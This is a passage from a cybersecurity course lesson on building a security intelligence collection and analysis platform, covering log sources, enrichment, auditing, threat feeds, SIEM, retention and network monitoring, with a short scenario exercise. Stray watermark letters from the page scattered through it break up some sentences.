administrator can inadvertently make the wrong change to a setting or
policy. A required patch or update may not be installed on a particular
D
system, or it may be inadvertently removed through a rollback, hardware
replacement, or some other configuration change. Because such changes
can happen at any time, you should implement continuous monitoring of
data from a variety of different logs and data sources, and transmit this
information to a secure database where it can be analyzed. Various events
lic
should trigger the collection of state data, such as system reboots, file
modifications, or the creation of new user accounts. Network logs should
provide data on an ongoing basis.
up
Security device logs Intrusion detection systems (IDSs) are devices or software applications
that monitor networks and applications to detect suspicious traffic
ot
Threat intelligence Threat intelligence sources help to focus security monitoring by providing
information on new threats and current threat trends. Sources of this
o
• SIEM, which detects alerts provided by devices and applications in real time or near real time.
• Security Content Automation Protocol (SCAP), a conglomeration of open standards that identify
flaws in security configurations.
• Network behavior anomaly detection (NBAD), which monitors network packets for
anomalous behavior based on known signatures.
Before selecting a tool type, you should make sure it fits the following criteria:
• It should collect information from numerous sources.
• It should be able to interoperate with other systems, such as a help desk or change
e
management program.
• It should comply with all relevant laws and industry regulations.
ut
• It should offer scalable reporting so you get both a high-level and low-level perspective on your
security.
ib
NetFlow
NetFlow is a protocol included in many enterprise-level routers and switches that enables network
tr
administrators to monitor the flow of information across a network. NetFlow has gone through
several updates since it was created by Cisco in the early 1990s, but the most recent versions provide
is
the following useful information about packets that traverse NetFlow-enabled devices:
• The networking protocol interface used.
D
• The version and type of IP used.
• The source and destination IP addresses.
(TCP) port.
• The IP's type of service (ToS) used.
or
• The source and destination User Datagram Protocol (UDP)/Transmission Control Protocol
You can use a variety of NetFlow monitoring tools to capture data for point-in-time analysis and to
e
diagnose any security or operational issues the network is experiencing. You can also integrate
at
Data Collection
Data Collection In general, the more data you collect, the more likely you will have the data you need. But you can't
monitor everything. Some data might not be helpful, and may, in fact, just add to your effort
up
without creating much value. Once you have the data, you must process it into a form that will
quickly reveal the information you need. You must strike a balance with security intelligence
collection between having enough information to get the job done and having so much information
D
that you make the task more difficult and expensive than it needs to be. Many sources for security
intelligence are available, such as those in the following figure.
ot
N
o
D
e
ut
ib
tr
is
D
Figure 7-2: Potential sources of security intelligence.
or
Ensure all the data you collect—including original logs and any files, databases, or systems in which
you aggregate that data—is protected by multiple layers of security. Also, make sure you do not
violate any privacy and compliance requirements by copying or storing restricted information.
e
at
Information Processing
Security data comes from a wide variety of sources. In its raw form, some of that data may not be Information Processing
lic
particularly useful for analysis. To produce actionable intelligence, patterns or anomalies must be
identified within the data that point toward a particular problem or vulnerability. The analysis
process may involve scanning by human eyes, pattern recognition by automation tools, or some
up
combination of both. Whether data is being scanned by humans or software, the data may need to
be reformatted or restructured to facilitate the scanning and analysis process.
There are many different formats for logs, such as proprietary binary formats, tab-separated or
D
comma-separated values (CSV), databases, syslog, Simple Network Management Protocol (SNMP),
and XML. Some formats may be directly readable through a simple text editor, while others are not.
There may be simple encoding differences, such as whether Linux®-style or Windows®-style end-of-
ot
line characters are used, or whether text is ANSI or Unicode. Another processing challenge is the
timestamps used in each log. Hosts might use incorrect internal clock settings, or settings that are
correct for a different time zone. These can vary widely from one log to another, making it difficult
N
Log Enrichment
D
Log enrichment attempts to address some of the challenges of processing information by Log Enrichment
enhancing the readability and usefulness of logs. Data in logs from different types of hosts can be
normalized to present information in a standard layout that will be easier for an analyst or analysis
software to read and compare. Data from different sources can be aggregated into a single form or
view to provide a clearer picture of the context and timing of events that occurred in different parts
of the system.
For example, an analyst might need to compare logs where information is recorded in different time
zones. If the time zones could be normalized into a single, primary zone, then it would save the
analyst a great deal of time and effort attempting to cross-reference the different timings for each
entry. Likewise, normalization techniques can ensure the consistency of field names. For instance,
you might have two logs, one that records an "event type" and one that records an "event ID." An
analyst might be confused and assume these two attributes are different, but if they actually describe
the same basic thing, you can normalize the field name to eliminate that confusion. Another
enrichment tactic is to resolve IP addresses in logs to known network hostnames to make it easier
for the analyst to identify what host the entry is referring to.
e
Because of the sheer number and volume of logs, it is most efficient to use automation tools to
ut
quickly format and combine logs with different content, formats, and timestamps. The security
practitioner may develop some of these tools from scratch, or may use a commercial or open source
tool, which may include log viewers, formatters, and conversion tools; visualization tools that
ib
present event data in a graphical format; or features provided by host-based intrusion detection
system (HIDS) products, security information, and SIEM software.
tr
Log Auditing
is
Log Auditing Log auditing is the process of evaluating an organization's logging architecture to determine if it is
meeting a set of predefined criteria. Log auditing is an important part of the intelligence collection
D
and analysis process, as it enables the organization to validate whether or not its logs are providing
value to the business, integrating with the overall risk management framework, and complying with
any applicable laws or regulations.
or
Auditing is typically a distinct discipline from the analyst or incident responder role, and is often
fulfilled by an external party. This ensures there is no conflict of interest, and that the evaluation is
more likely to be objective and free of bias (whether intentional or not). There are many techniques
e
that go into log auditing, and a truly in-depth discussion could fill an entire course.
Here are just a few examples of log auditing techniques:
at
• Source validation: In many organizations, logs are aggregated and sent over the network to an
appliance for further correlation and analysis. However, it's still important that a particular log
lic
can be traced back to its source for non-repudiation purposes. The system that created the log
should not be disassociated from that log, or its timeline may be compromised and its contents
unusable. An auditor might validate the source of a log through the use of digital signatures.
up
• Integrity verification: Like validating the source of a log, an auditor should be able to accurately
verify a log has not been tampered with. Attackers attempt to erase or falsify log data to cover
their tracks and confuse security professionals. Auditors can also verify log integrity through the
use of digital certificates, or they can use message authentication codes (MACs).
D
• Evidence collection: In order for an auditor to present a compelling case for whether or not a
logging architecture is in compliance, they need to be able to extract useful evidence from the
ot
logs. This evidence will influence the auditor's assertions and recommendations. The type of
evidence collected will vary greatly depending on the criteria being audited, but in general, the
auditor will be looking for events that indicate system misconfiguration, least-privilege violations,
N
Publicly Available There is a wide variety of publicly available sources of security intelligence. The following table lists
Information some of the major ones.
Free registries Free public registries, sponsored by organizations such as the U.S.
Department of Homeland Security and the MITRE Corporation, provide
public access to a collection of known threats, which are updated as soon
as they are made public.
Examples include:
e
• Open Vulnerability and Assessment Language (OVAL)
repositories provide a forum for participants to store and discuss a
ut
range of security content encoded in various standard XML formats
to represent system information, such as vulnerabilities,
configuration management, patch management, and policy
ib
compliance. OVAL® is international in scope, with content hosted by
CIS, MITRE, NIST, Cisco, various Linux vendors, and other
tr
organizations, and is funded by the U.S. Department of Homeland
Security.
is
Website: oval.mitre.org
• Common Weakness Enumeration (CWE™), sponsored by
MITRE, provides a catalog of software weaknesses and vulnerabilities,
D
with the goal of reducing security-related software flaws and creating
automated tools to identify, correct, and prevent such flaws.
Website: cwe.mitre.org
or
• The United States Computer Emergency Readiness Team (US-
CERT) provides four products in the National Cyber Awareness
System, which offer a variety of information for users with varied
e
technical expertise. Current Activity provides recent information
at
services registries, while others provide data that may not be found in the free
public registries. For example, Recorded Future claims its Intelligence
Graph is able to analyze dynamic data from billions of entities all over the
N
world.
o
D
e
• Schneier on Security: https://www.schneier.com
• Krebs on Security: https://krebsonsecurity.com
ut
• Dark Reading: https://www.darkreading.com
• Threatpost: https://threatpost.com
ib
• Fortinet blog: https://www.fortinet.com/blog
• Naked Security: https://nakedsecurity.sophos.com
• Security Boulevard: https://securityboulevard.com
tr
• Securosis blog: https://securosis.com/blog
is
Security mailing lists, You can subscribe to mailing lists to receive instant or digest updates on
newsgroups, and vulnerabilities and trends. Some lists are geared more toward attackers
newsfeeds than security specialists, but the information from these lists can tip you
D
off to potential problems.
Examples include:
or
• National Cyber Security Centre (NCSC) reports: https://
www.ncsc.gov.uk/index/report
• Usenet newsgroups such as alt.security, comp.risks,
e
comp.security.announce, and comp.virus
• Internet Storm Center Handlers Diary: https://isc.sans.edu
at
through Rich Site Summary (RSS) newsfeeds, mailing lists, and so forth.
Examples include:
up
lists.apple.com/rss/security-announce.rss
• Cisco: https://tools.cisco.com/security/center/rss.x?i=44
ot
• Debian: https://www.debian.org/security
Because security intelligence originates from many different sources and it can be difficult to
analyze, various initiatives are underway to provide that information in standard formats that can be
o
read by computers as well as humans. Many of these standards are associated with various registries
that provide security information.
D
Examples include:
• OVAL
• Malware Attribute Enumeration and Characterization (MAEC™)
• Structured Threat Information Expression (STIX™)
• Trusted Automated Exchange of Indicator Information (TAXII™)
• Common Weakness Scoring System (CWSS™)
e
Collecting cybersecurity intelligence has traditionally involved assembling a loose collection of tools Collection and Reporting
and information sources, such as system logs, NBAD, risk and compliance management, and Automation
ut
network forensics. With the processing capabilities of current cloud computing and big data SIEMs will be discussed
analytics tools, processing the large variety and quantity of data needed to provide instant more extensively in a
identification and reporting of security concerns is not only possible, but is also available as a later lesson.
ib
commercial product through the latest generation of security information and event management
(SIEM). SIEMs are available as software applications, network appliances, or managed cloud-based
tr
solutions.
Whereas early SIEMs required extensive manual configurations and were not much more
is
sophisticated than a homemade solution, recent products are quite helpful in automating the task of
data collection and reporting. They also provide an extensive library of connectors to automate data
D
collection from various sources, analytics tools optimized for security intelligence, reporting
templates, and so forth. SIEMs not only automate data collection, but they are very useful in
correlating data collected from different sources.
Data Retention or
To meet various compliance and regulatory requirements, organizations may be legally bound to Data Retention
e
retain certain types of data for a specified period. On the other hand, some requirements may
at
policies for each type of data—such as firewall logs, intrusion detection logs, system logs,
application logs, and so forth—and provide them to staff to ensure compliance. Policies should also
include guidelines on when and how to dispose of various types of data, and how to preserve
up
original copies of log files, if necessary. Organizations should also have policies to deal with the
inadvertent disclosure of sensitive information.
What is meant by "data retention" varies by industry, and there are many organizations such as the
D
National Institute of Standards and Technology (NIST) that provide guides to help organizations
define appropriate retention periods. There are also industry-specific groups such as EDRM that
provide a more specialized service. It is important to include legal counsel in your organization's
ot
data retention policies, as not meeting requirements can bring about unwanted liability.
Analysis Methods
N
An important part of building a data collection and analysis platform is employing a variety of Analysis Methods
o
monitoring and analysis methods. One method may be more effective than another in certain
circumstances, so selecting a comprehensive toolset that incorporates several of these methods is
D
happens, you'll usually attribute it to one cause. However, after time has passed and you gather
more intelligence, you may gain a new perspective and realize the nature of the cause is different
than you had originally thought.
• Correlation analysis is the process of identifying dependent relationships between different
forms of information that indicate some larger pattern of behavior. Correlation analysis is able to
identify activity that may not be observable when considering information in isolation; only until
that information is put in context with other information can a clearer picture of events emerge.
For example, a failed login attempt by a single account may not mean much, but if you correlate
that login attempt with a source IP address that has made many failed login attempts across
e
multiple accounts recently, you'll have a better understanding of what's happening.
• Anomaly analysis is the process of defining an expected outcome or pattern to events, and then
ut
identifying any events that do not follow these patterns. This is useful in tools and environments
that enable you to set rules, like an IDS—if network traffic or host-based events fail to conform
ib
to the rules, then the system will see this as an anomalous event. Anomaly analysis is useful
because you don't need to rely on known malicious signatures to identify something unwanted in
your organization, as this can lead to false negatives.
tr
• Behavioral analysis is the process of identifying the way in which an entity acts, and then
reviewing future behavior to see if it deviates from the norm. Behavioral analysis differs from
is
anomaly analysis in that the latter prescribes the baseline for expected patterns, and the former
records expected patterns in reaction to the entity being monitored. For example, a banking
D
system may track the average dollar value of withdrawals a customer makes; if the latest
withdrawal far exceeds the average, the system may conclude the account was hijacked and
freeze the customer's account.
•
or
Heuristic analysis is the process of identifying the way in which an entity acts in a specific
environment, and making decisions about the nature of the entity based on this. Rather than only
focus on the potentially unwanted entity, heuristic systems will consider how that entity may
negatively impact its surrounding context. Using various metrics, the heuristic system may
e
conclude that a particular entity is or is not a threat to the environment, and react accordingly.
For example, some anti-malware solutions will run software on the host operating system in a
at
sandbox environment to determine the effect it has on the system. If it identifies negative effects,
it may classify the software as malicious.
lic
Note: Because monitoring is a key component of these methods, they are also referred to as
"anomaly monitoring," "behavioral monitoring," etc.
up
Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
CHOICE Course screen.
ot
Guidelines for Follow these guidelines when deploying a security intelligence collection and analysis platform.
Determining Which Data
N
to Collect for Security Determine Which Data to Collect for Security Intelligence
Intelligence
To determine which data you should include in your security intelligence collection process:
o
• Identify risks: Risk management should be a major part of your intelligence collection process.
Be sure to identify specific risks that will have an impact on your organization.
D
• Prioritize risks: As part of the risk management process, prioritize the risks. You will likely have
to make some decisions regarding which data you will collect and process, so knowing which
threats you need to focus on will help you plan.
• Identify potential data sources: Starting with the most critical risks and working your way
through the list, identify every source of information that would be affected by an attack—
before, during, and after the attack, within your systems and outside your systems, within the
network (such as devices like routers and firewalls) and within hosts (such as servers, clients, and
mobile devices). Consider existing sources, such as system logs, as well as sources you might
need to set up in advance, such as packet capture or logging devices.
• Narrow your focus: Review each data source and identify its value. Compare its value to the
cost of storage, processing, and analysis. Determine if the information is duplicated elsewhere at
a lesser cost or whether another source will provide an earlier warning or more useful
information. Select the information sources that meet your requirements. Identify the data
amount, frequency, and duration you need to capture to provide an optimum ratio of cost and
value.
e
Determine Which Fields You Should Log
In many cases, you can custom-configure logging tools to determine what sort of information is Guidelines for
ut
logged. It is typically not feasible to capture everything possible, since it may seriously diminish the Determining Which
processing speed and may fill logs too quickly. So you need to be selective. In general, you should Fields You Should Log
ib
try to capture at least the five Ws:
• When the event started (and ended, if relevant).
• Who was involved in the event.
tr
• What happened, with specific detail to distinguish the nature of the event from other events.
is
• Where it happened—on which host, file system, network port, and so forth.
• Where the event originated (for example, a session initiated from an outside IP address over a
virtual private network [VPN] connection).
D
Consider pointing out
Configure Logging Systems Based on Their Impact that military
or
The NIST Special Publication 800-92, Guide to Computer Security Log Management, recommends that
you configure logging systems based on the priority of the systems they document, as described in
the example guidelines shown in this table. Some industry-specific regulations also provide
requirements on how long relevant data and logs should be held.
organizations will often
need to retain data for
longer periods than what
is listed in this table.
e
Guidelines for
Configuring Logging
Category Low-Impact Moderate-Impact High-Impact
at
25 MB)
If the organization requires the Every 3 to 24 hours Every 15 to 60 At least every 5
system to transfer log data to minutes minutes
D
How often log data needs to be Every 1 to 7 days Every 12 to 24 At least 6 times a
analyzed locally (through hours day
N
checking needs to be
performed for rotated logs.
D
analysis. As you configure your logging systems, identify which events should trigger an alert. This
table provides some examples, although your own criteria may vary.
Events That Should Trigger an Alert Events That Provide Useful Data for Later
Analysis
e
Attacks that are successful. Attacks that fail, including reconnaissance
ut
probes.
Reconnaissance probes or attacks with a good Low-impact probes and attacks.
chance of success.
ib
Failed logins. Any login.
tr
Note: Deciding how aggressive to be in creating alerts depends on how good your log analysis
is
tools are and how much space you have to store logs, as well as policy and regulatory
requirements.
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 7-1
Deploying a Security Intelligence Collection and
Analysis Platform
e
Scenario
ut
As of now, Develetech's intelligence collection and analysis efforts are not well unified, which has let
certain incidents slip past its defenses. Upper management is not pleased with the consequences of
these incidents. So, the Chief Information Security Officer (CISO) of Develetech wants to develop a
ib
new collection and analysis platform that will enable the security team to extract more useful,
actionable data from its assets. This will hopefully improve the process and bolster the security
tr
team's ability to protect the business. However, the CISO needs your help in developing the
platform.
is
Activity: Deploying a
Security Intelligence
The CISO is trying to convince other C-level personnel that Develetech needs Collection and Analysis
D
1.
Platform
to put an end to reactive security and start adopting a more proactive
approach to defending the organization.
or
What are the advantages of CSM that could convince management to offer
their financial backing?
e
A: Answers may vary, but with CSM, the organization is able to constantly survey all of its assets for
any behavior that induces risk. Data collected on this behavior is both up to date and actionable;
at
problems are detected immediately, and can likewise be contained as quickly as possible to
minimize damage. These CSM systems can also be configured and customized to suit the
organization's needs, even as business operations or the threat landscape change. Ultimately, a
lic
CSM can drastically reduce the risk of an attack going unidentified for a long period of time due to
stagnant collection processes.
The CISO would also like your input as far as which data sources to draw
up
2.
from as part of the new collection platform.
What steps would you take to determine which sources to choose for data
D
collection?
A: Answers may vary, but the organization should first identify the major risks it faces. The risk
ot
assessment team then needs to prioritize those risks by measuring the most likely risks against
the risks that will cause the most damage. This will enable the intelligence collection team to focus
on data that is most relevant to mitigating those risks. The collection team will review these
N
relevant data sources for components like alerts, logs, captures, etc., that can provide insight into
the risk. Lastly, the collection team will narrow their focus to the most actionable data, and attempt
to eliminate redundant data or data that does not provide optimal value.
o
3. When it comes to processing disparate types of data, what challenges will the
D
TOPIC B
Collect Data from Network-Based Intelligence
Sources
You've deployed various elements in a security intelligence collection and analysis platform, which
e
will help you organize and analyze large volumes of potentially useful data. Now you can begin
collecting intelligence from network resources.
ut
Network Device Configuration Files
ib
Network Device Network devices like routers and switches can often be configured through the use of discrete files.
Configuration Files These files provide a static baseline for a device's behavior, and they can also act as a backup in case
tr
the device needs to be reset or is taken offline. Configuration files may be stored locally on the
device, but they can also be stored on a server that a management console uses to deploy
is
configuration changes to all affected devices. In either case, these configuration files can provide you
with useful data about the device's behavior.
D
For example, a router's configuration file can include its internal IP address, wide area network
(WAN) IP address, virtual local area network (VLAN) information, security services (proxies, filters,
firewalls, etc.), and much more. In the event of a security incident, this information can be valuable
or
as you correlate a device's settings with suspicious traffic. A lapse in the device's firewall, for
instance, may help you understand why the traffic was able to pass through the router unabated and
onto hosts in the subnet. What's more, an attacker could attempt to adjust these configuration files
directly. By collecting data about this modification, including timing and differences from the
e
baseline, you can help identify the attacker's goals or planned vectors of attack.
at
lic
up
D
ot
N
o
D
Figure 7-3: Part of a router's configuration file. Note how it sets specific behavior, like its WAN
address.
e
State Data Element Description
ut
Routing tables Routing tables include destination addresses, the gateway required to
reach those destinations, the local interface that communicates with the
gateway, and metrics that measure the efficiency of each route. A
ib
suspiciously configured route can help you identify an attack. For
example, a routing table that takes excessively long paths could consume
network bandwidth and cause delays to disrupt service.
tr
CAM tables CAM tables are used by switches to forward packets to specific interfaces
is
rather than broadcasting traffic to all destinations as in a hub. They
essentially map MAC addresses to ports. An attacker connected to the
switch may be able to alter the CAM table to funnel all traffic to their
D
device, effectively acting as a man in the middle.
NAT tables Network address translation (NAT)-enabled routers contain tables that
or
map private IP addresses to the public address, as well as TCP and UDP
ports. This enables outgoing transmissions to use the public address and
incoming transmissions to find the correct private address it originated
from. Therefore, a NAT table can help you determine if communications
e
from internal to external, or vice versa, are being tampered with.
at
DNS cache Domain Name System (DNS) caches improve the efficiency of name
servers in that they reduce the overhead of constant resolution requests.
The cache stores an IP address and its corresponding domain name for
lic
Switches and routers can log both incoming and outgoing traffic. You can typically control the Switch and Router Logs
ot
verbosity of these logs, including filtering on specific actions (e.g., dropped and accepted
connections). Most routers/switches will at the very least include the destination address and source
address as part of the transmissions. These devices may also record the following information:
N
e
ut
ib
tr
is
D
or
Figure 7-4: A router's log for incoming traffic.
e
Note: Monitoring capabilities may differ in some router and switch deployments—some may
not monitor traffic at all.
at
Wireless Device Logs Wireless devices like wireless access points (WAPs) are not necessarily routers, but their logging
information often reflects a similar type and amount of traffic. The main difference is that some
up
WAPs also record wireless-specific information, like the channel and frequency used during
communication. This can help administrators diagnose interference, noise, or coverage problems.
Likewise, collecting this wireless data can assist security personnel in identifying service disruption
D
attacks, as wireless networking is less stable than wired networking and may be more vulnerable to
denial of service (DoS) conditions.
Linux syslogs are In large organizations, WAPs are often managed through the use of wireless local area network
ot
discussed in the next (WLAN) controllers. These controllers are able to configure the behavior of individual access points
topic. or all access points as a whole. Controllers are often integrated with Linux servers to output WAP
events as syslog data. For example, Cisco controllers enable you to specify multiple syslog servers
N
for output, and you can specify that certain messages are sent to certain servers. One administrator
may be tasked with reviewing logs with property A, and another administrator may be tasked with
reviewing logs with property B. The format of these logs follows the format of traditional Linux
o
syslogs, including a facility code and severity level for each message.
D
Firewall Logs
Firewall Logs Firewalls provide a line of defense at the network's borders to limit the types of traffic permitted to
pass in to (and possibly out of) the network based on certain rules or behavior. Because firewalls
provide such an important line of defense where a network may be most vulnerable, firewall logs
can provide a wide range of useful security intelligence, such as:
• Connections permitted or denied: Patterns within log data can help you identify holes in your
security policies. A sudden increase in rates resulting in denied traffic can reveal when attacks
were committed against your firewall.
• IDS activity: Configure the firewall with a set of IDS signatures to log attacks that occur.
• Address translation audit trail: Log network address translation (NAT) or port address
translation (PAT) to provide useful forensic data, which can help you trace the IP address of an
internal user that was conducting attacks on the outside world from inside your network.
• User activity: Produce an audit trail of security policy changes by logging firewall user
authentication and command usage.
e
• Cut-through-proxy activity: Log activity as end users authenticate and pass through the firewall
ut
to produce an audit trail of cut-through-proxy use.
• Bandwidth usage: Log each connection with its duration and traffic volume usage, which you
can break down by connection, user, department, and other factors.
ib
• Protocol usage: Log protocols and port numbers that are used for each connection, which you
can analyze statistically for patterns or anomalies.
tr
Because firewalls collect a large volume of data, you should employ a log collection tool to ensure
that data is not lost when logs roll over or are cleared within the firewall.
is
D
or
e
at
lic
up
NGFWs
Next-generation firewalls (NGFWs) are modern firewalls that can function at higher layers of the
D
Open Systems Interconnection (OSI) model than traditional firewalls. Most NGFWs work all the
way up to layer 7, the application layer. This provides NGFWs with deeper inspection capabilities so
they can detect and block specific unwanted traffic, rather than blocking an entire port, protocol, or
ot
source and destination otherwise used for legitimate purposes. Some NGFWs also incorporate
machine learning for more intelligent, data-driven analysis.
N
Some examples of NGFWs include the Cisco Firepower® series, Palo Alto Networks® next-
generation firewalls, and Check Point® Next Generation Firewall.
o
A web application firewall (WAF) is an application-layer firewall that can apply a set of rules to Web Application Firewall
HTTP traffic. These rules generally address web-based exploits and vulnerabilities, like SQL (WAF) Logs
injection attacks and cross-site scripting (XSS) attacks. Thus, a WAF is a more intelligent version of
the traditional firewall, and can protect web servers and clients from malicious traffic that fits known
attack signatures.
WAF logs are usually set to record an event when it trips a certain rule. Whether or not this means
the traffic is blocked is up to the administrator to configure.
Traffic that matches a suspicious or unwanted signature will typically be logged with the source and
destination addresses, why the traffic triggered an alert (what known suspicious behavior it
matched), and what action was taken (based on the configured rule).
The actual composition of the log will differ between WAF vendors, but some also include the
following useful information:
• The time of the event.
e
• The severity of the event. Not all events that trigger an alert are treated with equal suspicion.
ut
• The HTTP method(s) used in the event (e.g., a GET request).
• Any specific query used in the event.
• The specific web page path of the traffic.
ib
• More details about what kind of attack, if any, the event could indicate.
WAF Solutions
tr
Examples of WAFs include:
is
• NAXSI: An open source solution for Unix-like systems that relies on simple rules to block the
most common types of web-based exploits.
D
• ModSecurity™: An open source solution for Linux and Windows systems. Trustwave®, the
company that maintains ModSecurity, offers a core rule set for free, but also offers a paid service
of robust and constantly updated rules.
or
• Imperva® Web Application Firewall: A proprietary solution for Windows systems. This
solution correlates a baseline of your normal web apps' behaviors with crowd-sourced threat
intelligence to determine the types of traffic to block.
e
IDS/IPS Logs
at
IDS/IPS Logs Intrusion detection systems/intrusion prevention systems (IDSs/IPSs), whether wireless (WIDS/
WIPS) or otherwise, usually have a built-in logging feature that records traffic and alerts according
lic
to how the system is configured. You should configure the system to at least log any alerts that it
generates, without logging every single non-alert event it detects. Logs can vary depending on what
signatures you've told the IDS/IPS to generate an alert from. If all the IDS does is look for port
up
scans, then your log will be very brief and to the point. If your IDS/IPS scans many different
potential threats, then your log might become more difficult to wade through.
D
ot
N
o
D
To help standardize alert information, the Security Device Event Exchange (SDEE) server is an
IDS alert format and transport protocol specification based on the Simple Object Access Protocol
(SOAP). Because it is based on SOAP, SDEE uses common web protocols (such as HTTP/HTTPS
and XML) to communicate between different types of systems, such as a Cisco device and a
Windows or Linux log collection application. While SDEE provides standard types of security
events, and filters select events to be retrieved from SDEE providers, the standard supports
extensions so devices can provide additional types of events and filters, while remaining compatible
with the overall messaging scheme.
Systems that transmit security event data to clients are called SDEE providers. The provider is
typically an IDS. SDEE providers act as HTTP servers, whereas systems that request information
from the provider (such as a log collection application) are clients. Clients initiate HTTP requests.
As with any type of web client, the SDEE client establishes a session with the server by
authenticating. Once authenticated, an ID (or a cookie, essentially) is provided to the client to verify
e
future requests, enabling a client to maintain a session state with the server. Through SDEE,
ut
security events may be retrieved through two methods: an event query (a single request), or an event
subscription (an ongoing feed of events). Communication may be conducted over HTTP with
Secure Sockets Layer/Transport Layer Security (SSL/TLS), using an implementation such as
ib
OpenSSL.
IDS/IPS Solutions
tr
Examples of IDS/IPS solutions include:
is
• Snort®: An open source IDS/IPS currently developed by Cisco that is available for Linux and
Windows systems. You can configure Snort to detect and block network traffic that matches
your own custom rule set.
D
• Zeek IDS: An open source network monitor for Unix-based systems that can function as a
network intrusion detection system/host-based intrusion detection system (NIDS/HIDS),
among other features. Zeek IDS, formerly known as Bro, includes a custom scripting language
that enables you to set detection rules and action policies.
or
• Cisco Firepower: Proprietary network security software that runs on Firepower physical
appliances. In addition to being an NGFW and anti-malware solution, Cisco markets Firepower
e
as a next-generation IDS/IPS enhanced by full-stack visibility and contextual awareness.
• Suricata: A cross-platform open source IDS/IPS solution that also supports logging of DNS,
at
HTTP, and SSL/TLS activity. Suricata comes with its own rule set language, but also supports
more advanced scripting with the Lua programming language.
lic
Endpoint detection and response (EDR) systems monitor various hosts on a network (i.e., EDR can be considered
endpoints) for malicious or other unwanted behavior, and then take action to protect the host(s) a host-based intelligence
against this behavior. As mentioned previously, EDR is similar to host-based intrusion detection, source, but because
but tends to incorporate more advanced analysis techniques (e.g., trend analysis, heuristics, etc.) as it data is sent to a
D
monitors an endpoint. In some EDR solutions, these advanced techniques do not replace older centralized monitoring
platform over the
signature-based analysis, but supplement it.
network, it's being
ot
EDR systems are typically agent based; specialized software is deployed on each endpoint the discussed in the
security team wishes to monitor. This agent software collects and reports data to a centralized EDR network-based
platform where it can be analyzed. If the EDR system determines an endpoint is exhibiting intelligence sources
N
unwanted behavior, the EDR system can send alerts to an administrator at a dashboard or to the topic.
user of that endpoint. Some EDR systems can take direct action and send commands to the Endpoint Detection and
endpoint in real time, like shutting it down or disconnecting its network interface to isolate an Response (EDR) Logs
o
infection.
D
EDR is a relatively recent term and at times somewhat vague. Solutions from different vendors can
vary significantly in what they do and how they do it. Still, there are some common types of host
activity that all-in-one EDR solutions tend to log, including:
• Information about running software processes.
• Network traffic patterns.
• Account login activity.
• Changes to the OS file system, configuration files, and Registry.
Proxy Logs
e
ut
Proxy Logs When used in an organizational setting, web proxies act on behalf of internal employees by
forwarding their HTTP requests to the intended destination. This is often implemented in
environments where traffic outbound for the Internet needs to comply with some administrative or
ib
security policy. In addition, proxies can reveal the exact nature of HTTP requests, including the
websites that users visit and the contents of each request. They're also useful for preventing users
from contacting known sources of malware, even if inadvertently.
tr
Proxy logs can reveal quite a bit about each and every request and response that passes through the
is
proxy, including:
• The time of the request/response.
D
• The destination website.
• The internal IP address that made the request or is the recipient of the response.
• The HTTP method used in the request/response.
or
• The exact destination path of the request.
• The length and MIME type of the request.
• The exact contents of the request/response.
e
Proxies set up to intercept or block traffic can also record the rule that a request matched when it
was either halted or denied. An administrator or security professional can use this information to
at
you've offloaded to a third party. However, in most cases, your organization will reach an agreement
with a cloud provider that defines what types of information the provider will share, and what form
this information takes.
Many providers will, at the very least, offer audit logs to their clients. The extensiveness and
usefulness of these logs may vary, but in general, cloud audit logs enable a client organization to
verify information, such as administrative account activity (logins, service configurations, etc.) and
use of the cloud service's application programming interface (API) (automated database reads/
writes, automated deployments, etc.). Using these audit logs, you can identify any abnormal behavior
with regard to a cloud service and discover the who, what, and when of an event.
e
In addition, some providers offer general security bulletins that may be of interest to their clients.
ut
This can include everything from reporting on infrastructure security fixes, to generating reports of
suspected breaches that may impact all or specific clients. These security bulletins are typically
published on the service's official blog, sent out through mass email to clients, or made visible
ib
through clients' central administrative consoles. In addition, cloud providers may also offer threat
intelligence feeds that report on suspected threats targeting cloud services at any given time. Like
tr
more generalized threat intelligence feeds, feeds published by cloud providers can also incorporate
automated scoring mechanisms and other information that might influence an organization's
response.
is
Software-Defined Networking (SDN)
D
Software-defined networking (SDN) is an attempt to simplify the process of administrating a Software-Defined
network by separating systems that control where traffic is sent from systems that actually forward Networking (SDN)
or
this traffic to its destination. This enables a network administrator to directly program the control
systems without needing to also focus on the forwarding systems. Network administrators can more
easily manage the flow and logistics of their network, and adjust traffic on the fly based on their
e
needs.
SDN can assist the data collection process by gathering statistics from the forwarding systems and
at
then applying a classification scheme to those systems to detect network traffic that deviates from
baseline levels. This can provide you with a more robust ability to detect anomalies—anomalies that
lic
may suggest an incident. SDN therefore gives you a high-level perspective of network flow that may
not be possible with traditional network management controls.
up
intelligence. Logs from these sources can reveal anomalies, such as outages; configuration changes;
suspicious changes in traffic patterns, such as flash crowds; and other patterns of abuse.
ot
Network traffic and flow analysis tools can provide automated analysis of network traffic and flow
data, providing features such as:
• Reporting on traffic and flow, including trending patterns based on traffic generated by certain
N
define.
• Integrated secure packet capture and storage capabilities.
D
• Visualization tools that enable you to quickly create a map of network connections, and interpret
patterns of traffic and flow data.
• Identification of traffic patterns revealing rogue user behavior, malware in transit, tunneling,
applications exceeding their allocated bandwidth, and so forth.
• Verifying that sensitive data is being transmitted in an encrypted form, and detecting any
sensitive data that flows in plaintext.
Many free and commercial network traffic and flow analysis tools are available, with names like
NetFlow, J-Flow, sFlow, ManageEngine NetFlow Analyzer, SolarWinds NetFlow Traffic Analyzer,
Multi Router Traffic Grapher (MRTG), Cacti, and ntop.
e
ut
ib
tr
is
Figure 7-8: Network flow data logs.
D
SPAN Ports and TAP Devices
SPAN Ports and TAP
Devices
or
Security systems that monitor live network traffic typically use one of two approaches: SPAN or
TAP. It's important to familiarize yourself with the differences between the two, as those differences
have an effect on the data you receive for analysis, as well as the overall performance penalties the
e
monitoring process has on the network.
at
Switch port analyzer (SPAN) is an approach in which a network appliance (e.g., a switch or
router) takes the network packets that flow to and from one main port (or virtual local area network
[VLAN]) on the device, then copies those packets to another port (the mirror port). The mirror port
lic
then forwards the copied packets to the network monitoring system. The amount of network traffic
the SPAN port "sees" is dependent on where it sits between other network devices and hosts.
SPAN ports are easy to configure remotely, but their critical disadvantage is the amount of overhead
up
they add to the network. Having to duplicate packets can lead to congestion, which in turn can lead
to the SPAN port changing frame timings or dropping entire packets.
Test access point (TAP) is not a port on an existing device, but a dedicated device itself. The TAP
device sits between network appliances, often between a switch and router, and forwards both
D
incoming and outgoing packets between those appliances to a security monitoring system. The
packets are still sent between the switch and the router like normal, but they are also copied to
ot
separate monitoring ports on the TAP device (one port for incoming traffic, one for outgoing).
